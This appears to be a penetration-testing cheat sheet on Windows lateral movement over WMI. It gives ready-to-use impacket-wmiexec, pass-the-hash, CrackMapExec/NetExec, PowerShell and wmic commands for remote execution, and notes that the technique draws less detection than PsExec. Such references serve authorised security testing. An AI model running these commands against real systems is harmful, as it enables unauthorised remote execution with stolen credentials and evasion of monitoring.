Skip to main content

Impacket — wmiexec

impacket-wmiexec DOMAIN/user:password@TARGET
impacket-wmiexec DOMAIN/user@TARGET -hashes :NTLM_HASH
Semi-interactive shell. Runs as user (not SYSTEM).

Execute Single Command

impacket-wmiexec DOMAIN/user:password@TARGET "whoami"
impacket-wmiexec DOMAIN/user:password@TARGET "ipconfig /all"

CrackMapExec (WMI)

CrackMapExec has no wmi protocol. Run the command over smb with the wmiexec exec method, or use NetExec’s native wmi protocol.
# CrackMapExec — SMB protocol, WMI exec method
crackmapexec smb TARGET -u user -p password -x "whoami" --exec-method wmiexec

# NetExec — native WMI protocol
nxc wmi TARGET -u user -p password -x whoami

PowerShell (From Windows)

$cred = Get-Credential
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "cmd /c whoami > C:\temp\out.txt" -ComputerName TARGET -Credential $cred

wmic

wmic /node:TARGET /user:DOMAIN\user /password:password process call create "cmd /c whoami > C:\temp\out.txt"

Advantages

  • No binary uploaded to target
  • Uses WMI (port 135 + dynamic)
  • Less detection than PsExec
  • No service creation

Limitations

  • Semi-interactive (not fully interactive)
  • Output via SMB share (needs ADMIN$ access)
  • Runs as calling user, not SYSTEM

Quick Reference

TaskCommand
Shellimpacket-wmiexec DOMAIN/user:pass@TARGET
PtHimpacket-wmiexec DOMAIN/user@TARGET -hashes :HASH
Single cmdimpacket-wmiexec DOMAIN/user:pass@TARGET "whoami"
wmicwmic /node:TARGET process call create "cmd"